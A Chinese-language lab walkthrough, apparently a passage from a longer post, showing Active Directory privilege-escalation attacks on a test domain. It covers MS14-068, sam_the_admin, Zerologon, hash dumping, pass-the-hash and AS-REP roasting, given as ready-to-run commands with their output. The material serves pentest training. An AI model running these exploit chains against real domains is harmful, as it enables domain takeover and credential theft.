<figure class="highlight crmsh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><code class="hljs crmsh">C:\Users\user&gt;net <span class="hljs-keyword">user</span> <span class="hljs-title">/domain</span><br>&#x8FD9;&#x9879;&#x8BF7;&#x6C42;&#x5C06;&#x5728;&#x57DF; dbapp.lab &#x7684;&#x57DF;&#x63A7;&#x5236;&#x5668;&#x5904;&#x7406;&#x3002;<br><br><br>\\dc.dbapp.lab &#x7684;&#x7528;&#x6237;&#x5E10;&#x6237;<br><br>----------------------------------------------------------<br>Administrator            Guest                    krbtgt<br><span class="hljs-keyword">user</span><br><span class="hljs-title">&#x547D;&#x4EE4;&#x6210;&#x529F;&#x5B8C;&#x6210;&#x3002;</span><br><span class="hljs-title"></span><br><span class="hljs-title"></span><br><span class="hljs-title">C</span>:\Users\user&gt;whoami /<span class="hljs-keyword">user</span><br><br><span class="hljs-title">&#x7528;&#x6237;&#x4FE1;&#x606F;</span><br><span class="hljs-title">----------------</span><br><span class="hljs-title"></span><br><span class="hljs-title">&#x7528;&#x6237;&#x540D;     SID</span><br>========== ==============================================<br>dbapp\<span class="hljs-keyword">user</span> <span class="hljs-title">S-1-5-21-2476688485-4256841910-2155116890-1103</span><br><br><br>C:\Users\user&gt;ping dc.dbapp.lab -n <span class="hljs-number">1</span><br><br>&#x6B63;&#x5728; Ping dc.dbapp.lab [<span class="hljs-number">192.168</span>.<span class="hljs-number">99.100</span>] &#x5177;&#x6709; <span class="hljs-number">32</span> &#x5B57;&#x8282;&#x7684;&#x6570;&#x636E;:<br>&#x6765;&#x81EA; <span class="hljs-number">192.168</span>.<span class="hljs-number">99.100</span> &#x7684;&#x56DE;&#x590D;: &#x5B57;&#x8282;=<span class="hljs-number">32</span> &#x65F6;&#x95F4;=<span class="hljs-number">7ms</span> <span class="hljs-attr">TTL=</span><span class="hljs-number">128</span><br><br><span class="hljs-number">192.168</span>.<span class="hljs-number">99.100</span> &#x7684; Ping &#x7EDF;&#x8BA1;&#x4FE1;&#x606F;:<br>    &#x6570;&#x636E;&#x5305;: &#x5DF2;&#x53D1;&#x9001; = <span class="hljs-number">1</span>&#xFF0C;&#x5DF2;&#x63A5;&#x6536; = <span class="hljs-number">1</span>&#xFF0C;&#x4E22;&#x5931; = <span class="hljs-number">0</span> (<span class="hljs-number">0</span>% &#x4E22;&#x5931;)&#xFF0C;<br>&#x5F80;&#x8FD4;&#x884C;&#x7A0B;&#x7684;&#x4F30;&#x8BA1;&#x65F6;&#x95F4;(&#x4EE5;&#x6BEB;&#x79D2;&#x4E3A;&#x5355;&#x4F4D;):<br>    &#x6700;&#x77ED; = <span class="hljs-number">7ms</span>&#xFF0C;&#x6700;&#x957F; = <span class="hljs-number">7ms</span>&#xFF0C;&#x5E73;&#x5747; = <span class="hljs-number">7ms</span><br></code></pre></td></tr></table></figure>

<p>&#x4F2A;&#x9020;&#x4E00;&#x4E2A;&#x9AD8;&#x6743;&#x9650;&#x7684;&#x7968;&#x636E;&#xFF0C;&#x5411;&#x57DF;&#x63A7;&#x5730;&#x5740;&#x6267;&#x884C;ms14-068.exe</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">MS14</span>-<span class="hljs-number">068</span>.exe -u user@dbapp.lab -p <span class="hljs-number">123</span>qwe!@# -s S-<span class="hljs-number">1</span>-<span class="hljs-number">5</span>-<span class="hljs-number">21</span>-<span class="hljs-number">2476688485</span>-<span class="hljs-number">4256841910</span>-<span class="hljs-number">2155116890</span>-<span class="hljs-number">1103</span> -d <span class="hljs-number">192.168.99.100</span><br></code></pre></td></tr></table></figure>

<p>&#x751F;&#x6210;&#x4E86;<a href="mailto:TGT_user@dbapp.lab.ccache">TGT_user@dbapp.lab.ccache</a>&#x6587;&#x4EF6;</p>
<p>&#x4F7F;&#x7528;&#x6E05;&#x9664;&#x5E76;&#x4E14;&#x5BFC;&#x5165;&#x4F2A;&#x9020;&#x7684;&#x7968;&#x636E;</p>
<figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs elixir"><span class="hljs-comment">#&#x6253;&#x5F00;mimikatz</span><br>mimikatz<br><span class="hljs-comment">#&#x6E05;&#x9664;&#x7968;&#x636E;</span><br>kerberos::purge<br><span class="hljs-comment">#&#x67E5;&#x770B;&#x5F53;&#x524D;&#x7968;&#x636E;</span><br>kerberos::list<br><span class="hljs-comment">#&#x5BFC;&#x5165;&#x7968;&#x636E;</span><br>kerberos::ptc <span class="hljs-title class_">TGT_user</span><span class="hljs-variable">@dbapp</span>.lab.ccache<br></code></pre></td></tr></table></figure>

<p>&#x53E6;&#x5F00;&#x4E00;&#x4E2A;cmd&#xFF0C;&#x4F7F;&#x7528;PsExec64&#x8FDE;&#x63A5;&#x57DF;&#x63A7;&#xFF0C;&#x5E76;&#x6D4B;&#x8BD5;&#x662F;&#x5426;&#x8FDE;&#x63A5;&#x6210;&#x529F;</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs stylus">C:\Users\user\Desktop\MS14068_tools&gt;PsExec64<span class="hljs-selector-class">.exe</span> \\dc -s cmd<span class="hljs-selector-class">.exe</span><br><br>PsExec v2.<span class="hljs-number">43</span> - Execute processes remotely<br>Copyright (C) <span class="hljs-number">2001</span>-<span class="hljs-number">2023</span> Mark Russinovich<br>Sysinternals - www<span class="hljs-selector-class">.sysinternals</span><span class="hljs-selector-class">.com</span><br><br><br>Microsoft Windows <span class="hljs-selector-attr">[&#x7248;&#x672C; 6.1.7601]</span><br>&#x7248;&#x6743;&#x6240;&#x6709; (c) <span class="hljs-number">2009</span> Microsoft Corporation&#x3002;&#x4FDD;&#x7559;&#x6240;&#x6709;&#x6743;&#x5229;&#x3002;<br><br>C:\Windows\system32&gt;ipconfig<br><br>Windows IP &#x914D;&#x7F6E;<br><br><br>&#x4EE5;&#x592A;&#x7F51;&#x9002;&#x914D;&#x5668; &#x672C;&#x5730;&#x8FDE;&#x63A5;:<br><br>   &#x8FDE;&#x63A5;&#x7279;&#x5B9A;&#x7684; DNS &#x540E;&#x7F00; . . . . . . . :<br>   &#x672C;&#x5730;&#x94FE;&#x63A5; IPv6 &#x5730;&#x5740;. . . . . . . . : fe80::<span class="hljs-number">70</span>e3:<span class="hljs-number">2</span>a2f:ef21:<span class="hljs-number">4621%</span><span class="hljs-number">11</span><br>   IPv4 &#x5730;&#x5740; . . . . . . . . . . . . : <span class="hljs-number">192.168</span>.<span class="hljs-number">99.100</span><br></code></pre></td></tr></table></figure>

<h3 id="CVE-2021-42287&#xFF08;&#x8FDC;&#x7A0B;&#x63D0;&#x6743;&#xFF09;"><a href="#CVE-2021-42287&#xFF08;&#x8FDC;&#x7A0B;&#x63D0;&#x6743;&#xFF09;" class="headerlink" title="CVE-2021-42287&#xFF08;&#x8FDC;&#x7A0B;&#x63D0;&#x6743;&#xFF09;"></a><strong>CVE-2021-42287&#xFF08;&#x8FDC;&#x7A0B;&#x63D0;&#x6743;&#xFF09;</strong></h3><p><strong>&#x5229;&#x7528;&#x6761;&#x4EF6;&#xFF1A;&#x80FD;&#x591F;&#x8BBF;&#x95EE;&#x57DF;&#x63A7;&#x670D;&#x52A1;&#x5668;&#x4E14;&#x6709;&#x4EFB;&#x610F;&#x57DF;&#x7528;&#x6237;&#x8D26;&#x53F7;&#x5BC6;&#x7801;&#x3002;</strong></p>
<p>&#x642D;frp&#xFF0C;kali&#x5DE5;&#x5177;&#x4E00;&#x628A;&#x68AD;</p>
<figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs vim">proxychains4 <span class="hljs-keyword">python3</span> sam_the_admin.<span class="hljs-keyword">py</span> &#x57DF;/&#x7528;&#x6237;&#x540D;:<span class="hljs-string">&apos;&#x5BC6;&#x7801;&apos;</span> -dc-ip &#x57DF;&#x63A7;ip -<span class="hljs-keyword">shell</span><br>#&#x4F8B;&#xFF1A;<br>proxychains4 <span class="hljs-keyword">python3</span> sam_the_admin.<span class="hljs-keyword">py</span> dbapp.lab/user1:<span class="hljs-string">&apos;123qwe!@#&apos;</span> -dc-ip <span class="hljs-number">192.168</span>.<span class="hljs-number">122.100</span> -<span class="hljs-keyword">shell</span><br></code></pre></td></tr></table></figure>

<h3 id="CVE-2020-1472&#xFF08;&#x8FDC;&#x7A0B;&#x63D0;&#x6743;&#xFF09;"><a href="#CVE-2020-1472&#xFF08;&#x8FDC;&#x7A0B;&#x63D0;&#x6743;&#xFF09;" class="headerlink" title="CVE-2020-1472&#xFF08;&#x8FDC;&#x7A0B;&#x63D0;&#x6743;&#xFF09;"></a><strong>CVE-2020-1472&#xFF08;&#x8FDC;&#x7A0B;&#x63D0;&#x6743;&#xFF09;</strong></h3><p><strong>&#x5229;&#x7528;&#x6761;&#x4EF6;&#xFF1A;Win Server 2008 - 2019&#x3001;&#x80FD;&#x591F;&#x8BBF;&#x95EE;&#x57DF;&#x63A7;&#x670D;&#x52A1;&#x5668;&#x3001;&#x83B7;&#x5F97;&#x57DF;&#x63A7;&#x7684;&#x4E3B;&#x673A;&#x540D;&#x548C;IP&#x5730;&#x5740;</strong></p>
<p>&#x4F7F;&#x7528;github&#x5DE5;&#x5177;</p>
<figure class="highlight crmsh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs crmsh">git <span class="hljs-keyword">clone</span> <span class="hljs-title">https</span>://github.com/dirkjanm/CVE-<span class="hljs-number">2020</span>-<span class="hljs-number">1472</span><br></code></pre></td></tr></table></figure>

<p>&#x7F6E;&#x7A7A;&#x57DF;&#x63A7;&#x54C8;&#x5E0C;&#x503C;</p>
<figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs asciidoc">&#x250C;&#x2500;&#x2500;(kali&#x327F;kali)-[~/Desktop/CVE-2020-1472-master]<br>&#x2514;&#x2500;$ python3 cve-2020-1472-exploit.py dc 10.3.4.101  <br><span class="hljs-section">Performing authentication attempts...</span><br><span class="hljs-section">===================================================================</span><br>Target vulnerable, changing account password to empty string<br><br>Result: 0<br><br>Exploit complete!<br><br></code></pre></td></tr></table></figure>

<p>kali&#x4E0B;&#x4F7F;&#x7528;impacket  Dump&#x51FA;&#x6240;&#x6709;&#x54C8;&#x5E0C;&#x503C;</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><code class="hljs ruby">&#x250C;&#x2500;&#x2500;(kali&#x327F;kali)-[~<span class="hljs-regexp">/Desktop/</span><span class="hljs-variable constant_">CVE</span>-<span class="hljs-number">2020</span>-<span class="hljs-number">1472</span>-master]<br>&#x2514;&#x2500;<span class="hljs-variable">$ </span>impacket-secretsdump dbapp.lab/dc\<span class="hljs-variable">$@</span><span class="hljs-number">10.3</span>.<span class="hljs-number">4.101</span> -no-pass<br><span class="hljs-title class_">Impacket</span> v0.<span class="hljs-number">11.0</span> - <span class="hljs-title class_">Copyright</span> <span class="hljs-number">2023</span> <span class="hljs-title class_">Fortra</span><br><br>[-] <span class="hljs-title class_">RemoteOperations</span> <span class="hljs-symbol">failed:</span> <span class="hljs-variable constant_">DCERPC</span> <span class="hljs-title class_">Runtime</span> <span class="hljs-title class_">Error</span>: <span class="hljs-symbol">code:</span> <span class="hljs-number">0x5</span> - rpc_s_access_denied <br>[*] <span class="hljs-title class_">Dumping</span> <span class="hljs-title class_">Domain</span> <span class="hljs-title class_">Credentials</span> (domain\<span class="hljs-symbol">uid:</span><span class="hljs-symbol">rid:</span><span class="hljs-symbol">lmhash:</span>nthash)<br>[*] <span class="hljs-title class_">Using</span> the <span class="hljs-variable constant_">DRSUAPI</span> method to get <span class="hljs-variable constant_">NTDS</span>.<span class="hljs-variable constant_">DIT</span> secrets<br><span class="hljs-title class_">Administrator</span><span class="hljs-symbol">:</span><span class="hljs-number">500</span><span class="hljs-symbol">:aad3b435b51404eeaad3b435b51404ee</span><span class="hljs-symbol">:</span>65d8d37274c443e7dddaee4286a9403a:::<br><span class="hljs-title class_">Guest</span><span class="hljs-symbol">:</span><span class="hljs-number">501</span><span class="hljs-symbol">:aad3b435b51404eeaad3b435b51404ee</span><span class="hljs-symbol">:</span>31d6cfe0d16ae931b73c59d7e0c089c0:::<br><span class="hljs-symbol">krbtgt:</span><span class="hljs-number">502</span><span class="hljs-symbol">:aad3b435b51404eeaad3b435b51404ee</span><span class="hljs-symbol">:dbd96281f999cc0a3fbe58dc217ea11d</span><span class="hljs-symbol">:</span><span class="hljs-symbol">:</span>:<br><span class="hljs-symbol">user:</span><span class="hljs-number">1103</span><span class="hljs-symbol">:aad3b435b51404eeaad3b435b51404ee</span><span class="hljs-symbol">:</span>00affd88fa323b00d4560bf9fef0ec2f:::<br><span class="hljs-variable constant_">DC</span><span class="hljs-variable">$:</span><span class="hljs-number">1000</span><span class="hljs-symbol">:aad3b435b51404eeaad3b435b51404ee</span><span class="hljs-symbol">:</span>31d6cfe0d16ae931b73c59d7e0c089c0:::<br><span class="hljs-variable constant_">DBAPPPC</span><span class="hljs-variable">$:</span><span class="hljs-number">1104</span><span class="hljs-symbol">:aad3b435b51404eeaad3b435b51404ee</span><span class="hljs-symbol">:</span>02f5fe3bec77ff902cf60c2ab4a2a647:::<br>[*] <span class="hljs-title class_">Kerberos</span> keys grabbed<br><span class="hljs-title class_">Administrator</span><span class="hljs-symbol">:aes256-cts-hmac-sha1-</span><span class="hljs-number">96</span><span class="hljs-symbol">:e4668f6527fada029adcc77192b17878a471dcfcd7d3b8d84cdf6dea41570f5e</span><br><span class="hljs-title class_">Administrator</span><span class="hljs-symbol">:aes128-cts-hmac-sha1-</span><span class="hljs-number">96</span><span class="hljs-symbol">:</span>70f08df80d2b822024d908325f011801<br><span class="hljs-title class_">Administrator</span><span class="hljs-symbol">:des-cbc-md5</span><span class="hljs-symbol">:</span>20ae196b4031fd3b<br><span class="hljs-title class_">Administrator</span><span class="hljs-symbol">:rc4_hmac</span><span class="hljs-symbol">:</span>65d8d37274c443e7dddaee4286a9403a<br><span class="hljs-symbol">krbtgt:</span>aes256-cts-hmac-sha1-<span class="hljs-number">96</span><span class="hljs-symbol">:</span>53d7174ab967e570199e6b2907832bb80630710e8c6d06d6c2432eb9098486a1<br><span class="hljs-symbol">krbtgt:</span>aes128-cts-hmac-sha1-<span class="hljs-number">96</span><span class="hljs-symbol">:b4524eca62a4c3f7f3d49b854ea9a94c</span><br><span class="hljs-symbol">krbtgt:</span>des-cbc-<span class="hljs-symbol">md5:</span>464a9b68196e25d0<br><span class="hljs-symbol">krbtgt:</span><span class="hljs-symbol">rc4_hmac:</span>dbd96281f999cc0a3fbe58dc217ea11d<br><span class="hljs-symbol">user:</span>aes256-cts-hmac-sha1-<span class="hljs-number">96</span><span class="hljs-symbol">:a2c3481fbc6cf61866252077eaa8398987cf0cefd38659a15dedad1c934dffb1</span><br><span class="hljs-symbol">user:</span>aes128-cts-hmac-sha1-<span class="hljs-number">96</span><span class="hljs-symbol">:</span>9fe1ab1b45434e4c045b93a0eaac333b<br><span class="hljs-symbol">user:</span>des-cbc-<span class="hljs-symbol">md5:</span>98cbd5c12c4c0be3<br><span class="hljs-symbol">user:</span><span class="hljs-symbol">rc4_hmac:</span>00affd88fa323b00d4560bf9fef0ec2f<br><span class="hljs-variable constant_">DC</span><span class="hljs-variable">$:</span>aes256-cts-hmac-sha1-<span class="hljs-number">96</span><span class="hljs-symbol">:</span>591731fa6ec96467c81faebc8646c88de8bc2de7b8f6886fb74693a1de00f2a1<br><span class="hljs-variable constant_">DC</span><span class="hljs-variable">$:</span>aes128-cts-hmac-sha1-<span class="hljs-number">96</span><span class="hljs-symbol">:</span>2c5eee3ee6090f03d0c40ff6944688b5<br><span class="hljs-variable constant_">DC</span><span class="hljs-variable">$:</span>des-cbc-<span class="hljs-symbol">md5:</span>f44a64d04cf42f7f<br><span class="hljs-variable constant_">DC</span><span class="hljs-variable">$:</span><span class="hljs-symbol">rc4_hmac:</span>31d6cfe0d16ae931b73c59d7e0c089c0<br><span class="hljs-variable constant_">DBAPPPC</span><span class="hljs-variable">$:</span>aes256-cts-hmac-sha1-<span class="hljs-number">96</span><span class="hljs-symbol">:</span>31e7096cacb060f5b49b6225c3d7dd09e8e34ecd4c1c32476544f4756dd00331<br><span class="hljs-variable constant_">DBAPPPC</span><span class="hljs-variable">$:</span>aes128-cts-hmac-sha1-<span class="hljs-number">96</span><span class="hljs-symbol">:</span>106727d090c59e17ee071711366ed0a0<br><span class="hljs-variable constant_">DBAPPPC</span><span class="hljs-variable">$:</span>des-cbc-<span class="hljs-symbol">md5:</span>5268972cd5519dc8<br><span class="hljs-variable constant_">DBAPPPC</span><span class="hljs-variable">$:</span><span class="hljs-symbol">rc4_hmac:</span>02f5fe3bec77ff902cf60c2ab4a2a647<br>[*] <span class="hljs-title class_">Cleaning</span> up...<br></code></pre></td></tr></table></figure>

<p>&#x4F7F;&#x7528;Administrator&#x7684;hash&#x503C;&#x767B;&#x9646;DC</p>
<figure class="highlight smali"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs smali">&#x250C;&#x2500;&#x2500;(kali&#x327F;kali)-[~/Desktop/CVE-2020-1472-master]<br>&#x2514;&#x2500;$ impacket-wmiexec dbapp.lab/administrator@10.3.4.101 -hashes<span class="hljs-keyword"> :65d8d37274c443e7dddaee4286a9403a</span><br>Impacket v0.11.0 - Copyright 2023 Fortra<br><br>[*] SMBv2.1 dialect used<br>[!] Launching semi-interactive shell - Careful what you<span class="hljs-built_in"> execute</span><br><span class="hljs-built_in"></span>[!] Press help for extra shell commands<br>C:\&gt;<br></code></pre></td></tr></table></figure>

<h3 id="AS-REProast&#xFF08;&#x672C;&#x5730;-&#x8FDC;&#x7A0B;&#x83B7;&#x53D6;hash&#xFF09;"><a href="#AS-REProast&#xFF08;&#x672C;&#x5730;-&#x8FDC;&#x7A0B;&#x83B7;&#x53D6;hash&#xFF09;" class="headerlink" title="AS-REProast&#xFF08;&#x672C;&#x5730;/&#x8FDC;&#x7A0B;&#x83B7;&#x53D6;hash&#xFF09;"></a>AS-REProast&#xFF08;&#x672C;&#x5730;/&#x8FDC;&#x7A0B;&#x83B7;&#x53D6;hash&#xFF09;</h3><p><strong>&#x5229;&#x7528;&#x6761;&#x4EF6;&#xFF1A;&#x76EE;&#x6807;&#x7528;&#x6237;&#x7684; Kerberos &#x8D26;&#x6237;&#x672A;&#x542F;&#x7528;&#x9884;&#x8BA4;&#x8BC1;&#xFF08;Pre-authentication&#xFF09;</strong></p>
<p><strong>&#x65E0;&#x57DF;&#x5185;&#x6743;&#x9650;&#x8BF7;&#x6C42;&#x7528;&#x6237;&#x54C8;&#x5E0C;</strong></p>
<p>&#x6302;&#x4EE3;&#x7406;&#xFF0C;&#x83B7;&#x53D6;&#x4E3B;&#x673A;&#x5185;user1&#x7528;&#x6237;&#x7684;hash&#x503C;</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs stylus">&#x2500;&#x2500;(kali&#x327F;kali)-<span class="hljs-selector-attr">[~/Desktop/getnpusers.py-main]</span><br>&#x2514;&#x2500;$ proxychains4 python3 getnpusers<span class="hljs-selector-class">.py</span> dbapp.lab/user1@dc01<span class="hljs-selector-class">.dbapp</span><span class="hljs-selector-class">.lab</span> -dc-ip <span class="hljs-number">192.168</span>.<span class="hljs-number">122.100</span> -no-pass -request<br><span class="hljs-selector-attr">[proxychains]</span> config file found: /etc/proxychains4<span class="hljs-selector-class">.conf</span><br><span class="hljs-selector-attr">[proxychains]</span> preloading /usr/lib/aarch64-linux-gnu/libproxychains<span class="hljs-selector-class">.so</span>.<span class="hljs-number">4</span><br><span class="hljs-selector-attr">[proxychains]</span> DLL init: proxychains-ng <span class="hljs-number">4.17</span><br>Impacket v0.<span class="hljs-number">11.0</span> - Copyright <span class="hljs-number">2023</span> Fortra<br><br><span class="hljs-selector-attr">[*]</span> Getting TGT <span class="hljs-keyword">for</span> user1@dc01<span class="hljs-selector-class">.dbapp</span><span class="hljs-selector-class">.lab</span><br><span class="hljs-selector-attr">[proxychains]</span> Strict chain  ...  <span class="hljs-number">192.168</span>.<span class="hljs-number">205.160</span>:<span class="hljs-number">7777</span>  ...  <span class="hljs-number">192.168</span>.<span class="hljs-number">122.100</span>:<span class="hljs-number">88</span>  ...  OK<br><span class="hljs-variable">$krb5asrep</span>$<span class="hljs-number">23</span><span class="hljs-variable">$user1</span>@dc01<span class="hljs-selector-class">.dbapp</span>.lab@DBAPP<span class="hljs-selector-class">.LAB</span>:<span class="hljs-number">8</span>f95799bb191b2c20441831d201c66a4$<span class="hljs-number">0</span>adbf37f7f7064847c8ccb364c78e13eb36a8457479e1016055c22bb85d81238a3053fb8b5fd00b7c0d1bd3b0763d46041757f5c5707bb9ac72394169ddcf56fe31f052116aec680cc84467e15ab091da58c852855ee344812782e496757a8c1addf22e7108a9f94196a7c673d66ecd642f2145080b5c361924f06d1c3e6dac3b569ba088597b532dd3b4c910de88380dbdecbcf56360ec2b4074c0cd24aeeb65c3683833c7a0122139ea3f5a9731bf0b18395b2f7585b9a14142d73f454f3b8bc8e01e8a5c887f3a6e27877d36f693877b1eb71cf7e45cace2261c71a36d0de943387f1cff6<br><br></code></pre></td></tr></table></figure>

<p><strong>&#x6709;&#x57DF;&#x5185;&#x6743;&#x9650;&#x8BF7;&#x6C42;&#x7528;&#x6237;&#x54C8;&#x5E0C;</strong></p>
<p>&#x4E0A;&#x4F20;Rubeus.exe</p>
<figure class="highlight gherkin"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><code class="hljs gherkin">C:\Users\user1\Desktop&gt;Rubeus.exe asreproast<br><br>   ______        _<br>  (_____ \      |<span class="hljs-string"> </span>|<br>   _____) )_   _|<span class="hljs-string"> </span>|<span class="hljs-string">__  _____ _   _  ___</span><br><span class="hljs-string">  </span>|<span class="hljs-string">  __  /</span>|<span class="hljs-string"> </span>|<span class="hljs-string"> </span>|<span class="hljs-string"> </span>|<span class="hljs-string">  _ \</span>|<span class="hljs-string"> ___ </span>|<span class="hljs-string"> </span>|<span class="hljs-string"> </span>|<span class="hljs-string"> </span>|<span class="hljs-string">/___)</span><br><span class="hljs-string">  </span>|<span class="hljs-string"> </span>|<span class="hljs-string">  \ \</span>|<span class="hljs-string"> </span>|<span class="hljs-string">_</span>|<span class="hljs-string"> </span>|<span class="hljs-string"> </span>|<span class="hljs-string">_) ) ____</span>|<span class="hljs-string"> </span>|<span class="hljs-string">_</span>|<span class="hljs-string"> </span>|<span class="hljs-string">___ </span>|<br>  |<span class="hljs-string">_</span>|<span class="hljs-string">   </span>|<span class="hljs-string">_</span>|<span class="hljs-string">____/</span>|<span class="hljs-string">____/</span>|<span class="hljs-string">_____)____/(___/</span><br><span class="hljs-string"></span><br><span class="hljs-string">  v1.6.4</span><br><span class="hljs-string"></span><br><span class="hljs-string"></span><br><span class="hljs-string">[*] Action: AS-REP roasting</span><br><span class="hljs-string"></span><br><span class="hljs-string">[*] Target Domain          : dbapp.lab</span><br><span class="hljs-string"></span><br><span class="hljs-string">[*] Searching path &apos;LDAP://adcs.dbapp.lab/DC=dbapp,DC=lab&apos; for AS-REP roastable users</span><br><span class="hljs-string">[*] SamAccountName         : user1</span><br><span class="hljs-string">[*] DistinguishedName      : CN=user1,CN=Users,DC=dbapp,DC=lab</span><br><span class="hljs-string">[*] Using domain controller: adcs.dbapp.lab (192.168.122.200)</span><br><span class="hljs-string">[*] Building AS-REQ (w/o preauth) for: &apos;dbapp.lab\user1&apos;</span><br><span class="hljs-string">[+] AS-REQ w/o preauth successful!</span><br><span class="hljs-string">[*] AS-REP hash:</span><br><span class="hljs-string"></span><br><span class="hljs-string">      $krb5asrep$user1@dbapp.lab:37940C4A73782B497DD164372730573E$13E49131F73A81E7CEA4</span><br><span class="hljs-string">      9913B401B8F556D14856600FC74B4A4597BC712CA91A62CDD240C54D50CB2FDFC9B626A0643EDD11</span><br><span class="hljs-string">      A814D74479557FAAB727C92DF1552A79BA78B9C055FFE3A10333ADA0BE0F9024FFC2603EB2C84C34</span><br><span class="hljs-string">      3683B3092D3449C2922477FDCC674FD678A95D2C008D593C45328B661313AE374A2C6EDDE8F030E1</span><br><span class="hljs-string">      0E3E848257CB606E7904567B002AC93A677F978B9DCF85DEFD8D077A08F4FA2C89DEAFBE3C6AB060</span><br><span class="hljs-string">      03DB9B48CB8A9C28E6B2F585AD2A01BBE53E482DF7916843E6808A328EFECF551ED2911E30C73E79</span><br><span class="hljs-string">      531E2635CB3BC196372001E4AC5E33F866726AC5</span><br></code></pre></td></tr></table></figure>

<p>hash&#x503C;&#x4FDD;&#x5B58;&#x5230;&#x672C;&#x5730;&#xFF0C;&#x4F7F;&#x7528;hashcat&#x8FDB;&#x884C;&#x66B4;&#x529B;&#x7834;&#x89E3;</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">hashcat -m <span class="hljs-number">18200</span> <span class="hljs-built_in">hash</span> <span class="hljs-keyword">pass</span> --force<br></code></pre></td></tr></table></figure>

